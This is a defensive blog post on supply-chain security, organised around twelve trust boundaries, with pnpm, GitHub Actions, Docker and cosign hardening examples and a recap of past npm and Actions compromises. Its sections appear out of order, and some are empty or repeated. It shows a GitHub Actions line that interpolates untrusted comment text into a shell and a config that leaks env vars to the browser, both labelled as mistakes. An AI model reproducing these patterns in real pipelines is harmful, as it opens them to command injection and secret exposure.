A team can ship alone: SHA-pinning their own workflows. Lockfile pins. minimumReleaseAge in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny permissions: in their own workflows. Dockerfile non-root.

Needs platform / security org: CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on main. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.

If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external uses:, scope every permissions: block to least privilege, set minimumReleaseAge to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.

Translation table: the boundaries in your stack

This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.

Boundary	pnpm/JS	Python	Java/Maven	Go	Rust	Ruby	.NET
2. Pin to immutable identifier	`package.json` exact + `pnpm install --frozen-lockfile`	`pip-compile --generate-hashes` + `--require-hashes`; or `poetry install --no-update`; or `uv sync --frozen --locked`	`mvn-dependency-lock-plugin` + `dependencies.lock`	`go.sum` + `GOFLAGS=-mod=readonly`	`Cargo.lock` + `cargo --frozen --locked`	`Gemfile.lock` + `bundle config set frozen true`	`packages.lock.json` + `dotnet restore --locked-mode`
2. Cooldown on fresh publishes	`minimumReleaseAge` (pnpm-native)	Renovate `minimumReleaseAge` (covers PyPI); commercial: Socket, Phylum	Renovate (covers Maven Central)	Renovate (covers Go modules) + `govulncheck`	Renovate; `cargo-deny [advisories] yanked = "deny"`	Renovate; `bundler-audit`	Renovate
3. Lockfile integrity	`integrity: sha512:...` per entry	hash via `--require-hashes`; Poetry `content-hash`	Gradle `verification-metadata.xml`; Maven `--strict-checksums`	`go.sum` + `sum.golang.org`	Cargo lockfile checksums (built-in)	`bundle config set verify_files true`	`dotnet trust` for signed packages
4. Lifecycle script gate	`onlyBuiltDependencies` + `--ignore-scripts`	`pip install --only-binary=:all:`	audit `<build><plugins>` + checksum-pin them	`cgo` / `//go:generate` controlled via Bazel/Nix sandbox	`build.rs` sandboxed via Bazel `rules_rust` or `cargo-deny` bans	`bundle config force_ruby_platform true` to skip native; or sandbox	PackageReference (modern) doesn't run scripts; audit any `packages.config` projects
5. Base image digest pin	`FROM image:tag@sha256:...` (any Dockerfile, any language)	same	same	same	same	same	same
6. Image signing	cosign + Sigstore (any registry, any image)	same; PEP 740 attestations + `sigstore` for wheels	same; `sigstore-maven-plugin` for JARs	same; `slsa-github-generator/builder-go` for SLSA	`cargo-dist` + Sigstore	same	`dotnet nuget sign`; NuGet signature verification
7. CI mutable-ref pin	`uses: org/action@<sha>`; `pinact` enforce	(Python doesn't have an "Actions" concept; this is CI-platform, not language)	same	same	same	same	same
8. Default-deny permissions	GHA `permissions: {}`	(CI-platform; see CI table below)	same	same	same	same	same
11. Logger redaction	pino `redact:`	`structlog` processors + `logging.Filter`	Logback `MaskingPatternLayout`	`zap` custom encoder; `zerolog` `.Strs("redacted", ...)`	`tracing` `Layer`	`Rails.config.filter_parameters`	Serilog `Enrichers.Sensitive`
12. Force-pin transitive	`pnpm.overrides`	pip `constraints.txt`; uv `[tool.uv] override-dependencies`; Poetry → promote to direct	Maven `<dependencyManagement>`; Gradle `dependencySubstitution`	`replace` directive in `go.mod`	`[patch.crates-io]` in `Cargo.toml`	Direct `gem 'foo', '1.2.3'` in `Gemfile`	`Directory.Packages.props` central management

CI translations for Boundaries 5–9:

	GitHub Actions	GitLab CI	Buildkite	CircleCI	Jenkins	AWS CodeBuild
Mutable-ref pin (B7)	`uses: org/action@<sha>` + `pinact`	`include: ref: <sha>` + Renovate `gitlabci-include`	Plugin `@<sha>` + Renovate `buildkite`	Inline orbs; or pin `orbs: foo/bar@<exact-version>`	`@Library('foo@<sha>')`	Pre-mirrored installers + checksum verify in `pre_build`
Default-deny perms (B8)	`permissions: {}`	`id_tokens:` per-job; protected variables	Agent-queue ACLs; secrets via Vault Agent	Restricted contexts	`withCredentials` per-step; folder-level isolation	Per-project IAM role; `SECRETS_MANAGER` vars
OIDC trust (B8)	`sub`/`job_workflow_ref` anchored	`CI_JOB_JWT_V2` audience-bound	OIDC plugin since 2023	`circleci/oidc-orb`	Workload identity / `manage-credentials-binding-plugin`	`aws sts assume-role-with-web-identity`
Shell injection (B9)	`actionlint` + `zizmor`	`glab ci lint`; `semgrep p/ci`	`buildkite-pipeline-lint`	`circleci config validate`	Pipeline Linter; `pipeline-utility-steps`	`cfn-lint` + `checkov`
Image signing identity (B6)	OIDC issuer `token.actions.githubusercontent.com`	`CI_JOB_JWT_V2` issuer	Buildkite OIDC issuer	`oidc.circleci.com`	OIDC via plugin or workload identity	CodeBuild OIDC tokens

Cross-cutting tools, alphabetical:

Audit (CVE in deps): pnpm/npm audit → pip-audit (Python), mvn dependency-check:check or Gradle dependencyCheckAnalyze (Java), govulncheck (Go, symbol-aware reachability), cargo audit + cargo-deny (Rust), bundler-audit (Ruby), dotnet list package --vulnerable --include-transitive (.NET). Cross-stack: OSV-Scanner (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.
Cosign: ecosystem-agnostic. Works on any container image and on generic blobs.
gitleaks: stack-agnostic. Alternatives: trufflehog, detect-secrets, GitHub native push protection. Run several; they catch different things.
CodeQL: native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.
minimumReleaseAge: native in pnpm. Universal via Renovate (minimumReleaseAge config), covering npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.
SBOM: syft is stack-agnostic. Per-stack: cyclonedx-bom (Python), cyclonedx-maven-plugin (Java), cyclonedx-gomod (Go), cargo cyclonedx (Rust), bundler-cyclonedx (Ruby), dotnet CycloneDX (.NET). Consume with Dependency-Track; scan with Trivy or Grype.

The boundary survives. The YAML changes.

Closing

Last week a colleague's PR went red on pinact --check --verify because they'd added actions/checkout@v6 instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from tj-actions. Repeat across 110 uses: lines, 16 workflows, 7 production Dockerfiles, and one _.template CVE that turned out not to matter. That's the week.

The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an _.template CVE buried four levels deep in a transitive dep nobody knew was there.

The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for ${{ github.event across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."

That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.

If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a minimumReleaseAge of at least 3 days on your package manager. Put the first two as required status checks on main. Together they would have stopped axios@1.14.1 cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.

For a regulated workload (healthcare staffing means downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS), the calibration looks like this: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.

If you've calibrated minimumReleaseAge differently, I want to hear the number and why, especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.

Appendix: minimal viable starter pack

A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:

Lock manifests committed; CI install command refuses to mutate them.
minimumReleaseAge (pnpm) or Renovate equivalent set to ≥ 3 days.
Lifecycle-script default-deny: pnpm.onlyBuiltDependencies allowlist + --ignore-scripts in CI; equivalent gate per stack.
Base images pinned by @sha256: digest. Non-root USER in every production image.
Workflow / pipeline default-deny on permissions; per-job grants.
Mutable references (uses:, include:, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.
Untrusted CI input passed via env vars, never interpolated into shell.
Image signing via cosign + Sigstore (or stack-equivalent provenance).
PR-time secret scanning (gitleaks / trufflehog).
PR-time dependency CVE gate (pnpm audit + per-stack equivalents above) with documented expiry-forced allowlist.
Logger redaction at framework level for auth headers, cookies, password / token / secret keys.
CODEOWNERS covering every file in this list.

Each item is a few lines of configuration. Total cost is roughly the week described above for a multi-project monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.

Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1

Ahmad Kanj — Fri, 08 May 2026 12:38:49 +0000

On March 30, 2026, an attacker who had stolen an axios maintainer's npm publish credentials pushed axios@1.14.1 to the registry. The version looked like a normal patch a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.

Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running pnpm install or npm install against a ^1.14.0 constraint pulled 1.14.1 automatically. (^1.14.0 means "any 1.x.y ≥ 1.14.0" most package managers express the same idea: ~= in pip, ^ in Cargo, ~> in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.

axios@1.14.1 added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): plain-crypto-js@4.2.1. That package's postinstall script, a hook the package manager runs automatically after install, the canonical Node footgun, with analogues in pip's setup.py build hooks, Ruby's gem extconf, and Cargo's build.rs ran node setup.js, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. The compromise wouldn't have been visible to anyone glancing at the lockfile diff. A new transitive in a stable utility, the kind of churn most teams approve without thinking.

Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.

Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting /review on a pull request. I stopped on this line:

# .github/workflows/opencode-review.yml:108
COMMENT_BODY="${{ github.event.comment.body || '' }}"

The if: block above it gated only on startsWith(comment.body, '/review'). There was no comment.author_association check. Anyone who could comment on a PR including a drive-by from a public fork could trigger this workflow. The job loaded OPENROUTER_API_KEY from AWS Secrets Manager, and ran with pull-requests: write, issues: write, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.

Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship we trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.

I work on a multiple projects monorepo (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after axios@1.14.1 shipped, a Slack message landed in our channel: "we have Wiz, SonarCloud, gitleaks, Renovate but are we good?" Seven days later I had a triaged P0/P1/P2 list 12 P0s (auth, secrets, registry trust), 18 P1s (pinning, permissions, lifecycle), 17 P2s (logging, SBOM, hardening) and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.

What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.

Where the attack surface actually lives now

Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.

The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes package-lock.json, Pipfile.lock, Cargo.lock, Gemfile.lock, go.sum). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered or leaks a publish token approaches zero.

Recent incidents to anchor frequency:

2018: event-stream (npm advisory 737): maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/copay-dash Bitcoin wallet specifically conditional payload, no effect on other consumers.
2021: ua-parser-js: npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.
2021: codecov bash uploader (CVE-2021-32699): modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.
2022: node-ipc (CVE-2022-23812): maintainer protestware. Wiped files on Russian and Belarusian IPs.
2024: xz-utils (CVE-2024-3094): multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via liblzma linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of sshd login latency, before the affected versions reached most stable distributions.
2024: @solana/web3.js (GHSA-7493-mqf3-cv5g): npm token compromise. Wallet drainer in published versions for ~5 hours.
2025: tj-actions/changed-files (CVE-2025-30066): chained through reviewdog/action-setup (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.
2025: Shai-Hulud npm worm: the first true self-replicating npm worm. A postinstall harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.
2025: Nx s1ngularity worm: npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream nx-init- repositories. Directly relevant to anyone on an Nx monorepo.
2026: axios@1.14.1: as above.

The twelve boundaries

Security engineers thinks in boundaries points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases what enters your repo (1–4), what runs during your build (5–9), what ships at runtime (10–12) plus a final section on what to do when one of them fails. Some will.

Phase 1 Source-side: what enters your repo

Boundary 1: Source → Repository (Who can write to `main`?)

The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to main; only the merge bot can, and only after policy passes.

Boundary 2: Maintainer → Package (Is this dependency safe?)

Threat: typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. axios@1.14.1 is the canonical example of the third published from a stolen credential, malicious for three hours, gone afterwards.

Controls registry-time:

Pin to immutable identifiers. Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; pnpm install --frozen-lockfile (or npm ci, pip install --require-hashes, cargo --frozen --locked, mvn -B verify, bundle install --frozen, dotnet restore --locked-mode) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.
Cooldown on freshly published versions. Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits xz-utils ran for ~2 years undetected so this control buys hours-to-days of latency, not certainty.

   # pnpm-workspace.yaml value is in minutes; 4320 min = 72 h = 3 days
   minimumReleaseAge: 4320

Stack-neutral: pnpm has this natively; Renovate's minimumReleaseAge config covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform any ecosystem Renovate manages. For stacks without native or Renovate support, layer reputation signals: Socket (behavioural risk score), Phylum (heuristic quarantine), OSV-Scanner + EPSS scores for exploit-likelihood prioritisation, OpenSSF Scorecard for upstream maintenance health, npm audit signatures for registry signature verification.

Provenance. Where available, prefer packages published with provenance attestations. npm publish --provenance (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + sigstore-maven-plugin for Java. Provenance doesn't stop a credential-theft attack like axios the malicious workflow would still produce a signed entry but it gives forensics a starting point.

Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)

Threat: registry compromise, off-registry tarballs without integrity, mid-flight tampering.

Controls: lockfile committed; integrity hash (sha512:, sha256:, OCI digest) on every entry; CI install command refuses to mutate the lockfile. Easy thing to miss: a lockfile entry like tarball: https://cdn.somehost.com/foo.tgz without an integrity: field is functionally latest. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.

# tools/scripts/verify-supply-chain.sh runs in CI
# Fails if the lockfile contains any off-registry tarball not on this allowlist.
EXPECTED_TARBALLS=(
  "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"  # SheetJS withdrew xlsx from npm in 2023
)

The general invariant translates: pip's --require-hashes, Cargo's checksum field, Maven's --strict-checksums, NuGet package signing, Go's module sum database every modern package manager has the primitive. The discipline is auditing for entries where it isn't enforced.

Boundary 4: Install → Lifecycle scripts (What runs on install?)

Threat: malicious lifecycle hooks. The axios attack's payload ran here. plain-crypto-js@4.2.1's entire malicious behaviour was a postinstall: node setup.js. Without that hook, the package would have sat on disk doing nothing until something require()'d it and axios doesn't import plain-crypto-js. The postinstall was the only thing that turned a passive disk write into RCE during install.

Controls:

Default-deny on install scripts, allowlist of who may run them:

   {
     "pnpm": {
       "onlyBuiltDependencies": [
         "esbuild",
         "@swc/core",
         "@datadog/native-iast-taint-tracking",
         "prisma"
       ]
     }
   }

Behavioural quarantine. Socket and Phylum analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. npq wraps npm install to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but plain-crypto-js's node setup.js → C2 download is exactly the shape they flag.
Build-host sandboxing. Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.

Stack equivalents: pip's risky surface is setup.py install hooks (mitigate with --only-binary=:all:); Ruby's is gem install running extconf.rb; Cargo's is build.rs (sandbox via Bazel rules_rust or cargo-deny bans); .NET's modern PackageReference does not run scripts (legacy packages.config does); Maven and Gradle's are build plugins (audit <build><plugins> and buildscript { dependencies }).

Phase 2 Build-side: what runs during your build

Boundary 5: Source → Image (Is our build environment trustworthy?)

Threat: base image tag rewrite, secrets baked into image layers.
Controls:

Pin every FROM by @sha256:<digest>. Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).

   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]

Drop privileges with USER before CMD. For Node images: USER node. For nginx: switch to nginxinc/nginx-unprivileged (drop-in non-root replacement listening on 8080).
Never put secrets in ARG defaults they persist in docker history. Use BuildKit --mount=type=secret for build-time secrets.
Hermetic builds for the highest tier. Bazel rules_oci, Nix dockerTools, Chainguard's apko + melange produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.

Boundary 6: Image → Registry (Can downstream verify what we shipped?)

Threat: image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.

Verify with workflow-path anchoring, not a loose org regex:

cosign verify <image>@<digest> \
  --certificate-identity-regexp "^https://github\.com/yourorg/yourrepo/\.github/workflows/release\.yml@refs/heads/main$" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  --certificate-github-workflow-repository "yourorg/yourrepo" \
  --certificate-github-workflow-ref "refs/heads/main"

An open ^https://github.com/yourorg/ regex matches any workflow under the org including a malicious workflow added in a fork and run via pull_request_target. Anchor on the workflow path, the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing ^ or $) match more workflows than you intended.

Signing alone does not satisfy SLSA (Supply-chain Levels for Software Artifacts a framework grading build provenance trustworthiness). The signature proves who built the image, not how. SLSA Build L3 requires provenance attestations in in-toto format (https://slsa.dev/provenance/v1 predicate), produced by cosign attest --predicate from a hardened, isolated builder such as slsa-github-generator. Verify with cosign verify-attestation. The signature is the foundation. The attestation chain is the rest of the building.

A signature you don't verify at deploy time is theatre. Wire cosign verify into a Kubernetes admission controller Kyverno verifyImages, Connaisseur, or Sigstore policy-controller so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native gh attestation verify (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.

Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via cosign sign-blob. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft same cosign sign --identity-token flow, different iss claim. PEP 740 attestations + python -m sigstore cover Python wheels; sigstore-maven-plugin covers Java JARs.

Boundary 7: Tag → Commit (What does this `uses:` / include / plugin actually point to?)

Controls: pin every external uses: to a 40-character commit SHA with a tag comment.

- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
- uses: pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58 # v6

Enforce in CI with pinact run --check --verify. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack pinact will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's gh attestation verify for Action artifacts (GA 2024), StepSecurity Harden-Runner for egress-policy + tampering detection on the runner, or human review of any flagged drift.

Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)

Threat: any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with permissions: write-all receives a GITHUB_TOKEN with write scopes across that repository's API surface contents, issues, pull requests, packages, deployments for the duration of that workflow run.

Controls: default-deny at workflow level, grant per-job:

permissions: {}

jobs:
  deploy:
    permissions:
      contents: read       # for checkout
      id-token: write      # for AWS OIDC

zizmor (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running permissions: write-all. Today none of them do.

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  },
  "StringLike": {
    "token.actions.githubusercontent.com:sub": "repo:yourorg/yourrepo:ref:refs/heads/main"
  }
}

For higher precision than sub, use job_workflow_ref it constrains to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.

Boundary 9: Untrusted input → Shell (CWE-78 in CI)

Unsafe:

run: echo "Reviewing: ${{ github.event.comment.body }}"

Safe:

env:
  BODY: ${{ github.event.comment.body }}
run: echo "Reviewing: $BODY"

Phase 3 Runtime-side: what ships and what leaks

Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)

We had this:

// vite.config.ts
define: {
  'process.env': process.env,   // TODO: fix this later
},

Safe:

define: {
  'process.env.PUBLIC_API_URL': JSON.stringify(process.env.PUBLIC_API_URL),
  // explicit allowlist; nothing implicit
},

Same principle for NEXT_PUBLIC_*, VITE_*, REACT_APP_*, EXPO_PUBLIC_* env vars assume browser-readable, never put secrets behind these prefixes. Same failure mode in mobile too: Android BuildConfig.API_KEY = "$apiKey" from a checked-in gradle.properties; iOS API keys in Info.plist or xcconfig. Assume any string in the artefact is extractable.

Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)

Controls: redaction at the framework level (not per call-site):

import pino from 'pino';

export const logger = pino({
  redact: {
    paths: [
      'req.headers.authorization',
      'req.headers.cookie',
      'config.headers.authorization',  // catches Axios errors
      '*.password', '*.token', '*.secret',
    ],
    censor: '[REDACTED]',
  },
});

The limit. pino redact is a denylist; it only scrubs the paths you list. Custom auth headers (x-api-key, x-vault-token), GraphQL variables.password, request.body.token, provider-specific shapes easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.

Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)

Threat: vulnerable transitive dependency, no maintainer response, can't wait.

Controls: force-pin the transitive with documented rationale and an expiry date:

{
  "pnpm": {
    "overrides": {
      "lodash-es": "4.17.23",
      "tar": "7.5.11"
    }
  }
}

Override-rot is real outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The audit-allowlist.json schema we use:

{
  "ghsa": "GHSA-xxxx-yyyy-zzzz",
  "package": "the affected package",
  "severity": "high | critical",
  "rationale": "why this risk is accepted (must explain reachability or absence of fix)",
  "verified_by": "engineer email or handle",
  "added": "YYYY-MM-DD",
  "expires": "YYYY-MM-DD",  // max 90 days
  "follow_up": "what removes this entry"
}

CI fails when expires passes; the gate forces a re-decision rather than letting drift accumulate.

When prevention fails: the response side

Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.

Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.

What one week of focused work actually moved

Control	Before	After
Third-party Action SHA pinning	0% of 110 `uses:` lines	100% with `pinact` CI gate
Workflow `permissions: write-all`	8 of 16 workflows	0
Lockfile integrity coverage	99.97% (1 off-registry tarball, no `integrity:`)	99.97% + CI allowlist enforcement with rationale per off-registry entry
`minimumReleaseAge`	12 hours	3 days
Production Dockerfile USER directive	0 of 7 (all root)	7 of 7 (non-root)
Production base image digest pinning	0 of 7	7 of 7
Image signing	none	cosign keyless on every ECR push, workflow-path-anchored verify identity
PR-time secret scanning	pre-commit only (skippable)	pre-commit + CI (unskippable)
PR-time SAST	none	CodeQL `security-extended`
Workflow security audit	none	`actionlint` + `zizmor`
Dependency CVE gate	none	`pnpm audit --prod --audit-level high` with documented allowlist
SBOM generation	none	CycloneDX + SPDX on every push to main

The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:

Day 1: Boundary 7. Audit of .github/workflows/. Every external uses: was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. pinact run --check --verify added as required status check.
Day 1: Boundary 8. 8 of 16 workflows ran with permissions: write-all. Tightened to workflow-level permissions: {} plus per-job grants. zizmor added as the gate. First staging deploy broke because permissions: {} revealed an undeclared packages: read that a publish job had been silently inheriting through the old write-all. Caught in PR; one-line add to per-job permissions.
Day 2: Boundary 9. The opencode-review.yml:108 CWE-78 (the lede). Four-line fix.
Day 2: Boundary 10. apps/front/remote-homepage/vite.config.ts:30 had 'process.env': process.env, with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.
Day 3: Boundary 8. build-and-publish-service.yml lines 128 and 469: both Wiz container scan steps had continue-on-error: true || true. Doubly non-blocking. Two engineers had to reach for the keyboard to make those scans non-fatal. Removed both bypasses.
Day 3: Boundary 3. Lockfile audit found one off-registry tarball: https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz, in two lambda package.json files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).
Day 4: Boundary 12. pnpm.overrides audit; the lodash story below.
Day 4: Boundary 2. minimumReleaseAge calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a postcss@8.5.12 patch published four days earlier, settled at 4320 (3 days).
Day 4: Boundary 5. Production Dockerfile sweep. 7 of 7 images ran as root. Added USER node; switched nginx-fronted images to nginxinc/nginx-unprivileged.
Day 5: Boundary 6. Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.

Five lessons that don't fit in a framework

1. The "patched version" you find in an advisory is not always the version you can ship.

Day 4 the advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via _.template) said "fixed in 4.18.0." Our pnpm.overrides had lodash-es: 4.18.0 and lodash: 4.18.1 both flagged green by the advisory.

I kept the terminal open and ran:

grep -rE '_\.template\(' apps/ libs/

Nothing. Across multiple projects, no production source called _.template. The vulnerable code path was unreachable.

That grep is a hand-rolled approximation of reachability analysis the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with taint-tracking queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.

The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.

2. Aggressive controls block legitimate fixes. Calibrate, don't posture.

Started at minimumReleaseAge: 10080 (7 days, pnpm's recommended baseline). Within the hour it blocked postcss@8.5.12, a CVE patch published four days earlier. Dropped to 3 days.

3. Detection without enforcement is not security.

The week started with the Slack message above. The most striking finding: every right primitive was already there Wiz, SonarCloud, Renovate, gitleaks, custom rules. None of them were blocking merges. Wiz container scans were running with continue-on-error: true || true. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with --no-verify. Renovate filed PRs nobody was required to merge.

Moving those gates into PR-time required-status-checks (same tools, same configurations, just required: true in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement we don't have a counterfactual. Take it as senior intuition.

4. The blast radius of a CI compromise is usually larger than any application bug.

5. These controls assume a clean threat model. Both halves of that assumption fail.

Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.

Process and culture

Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:

CODEOWNERS on every supply-chain surface. Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and audit-allowlist.json itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.
Allowlists with expiry, never silent ignores. Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.
Default-deny as engineering culture. permissions: {} at workflow level. Empty Dockerfile USER rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.

What you can ship alone vs. what needs platform

Translation table: the boundaries in your stack

This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.

Boundary	pnpm/JS	Python	Java/Maven	Go	Rust	Ruby	.NET
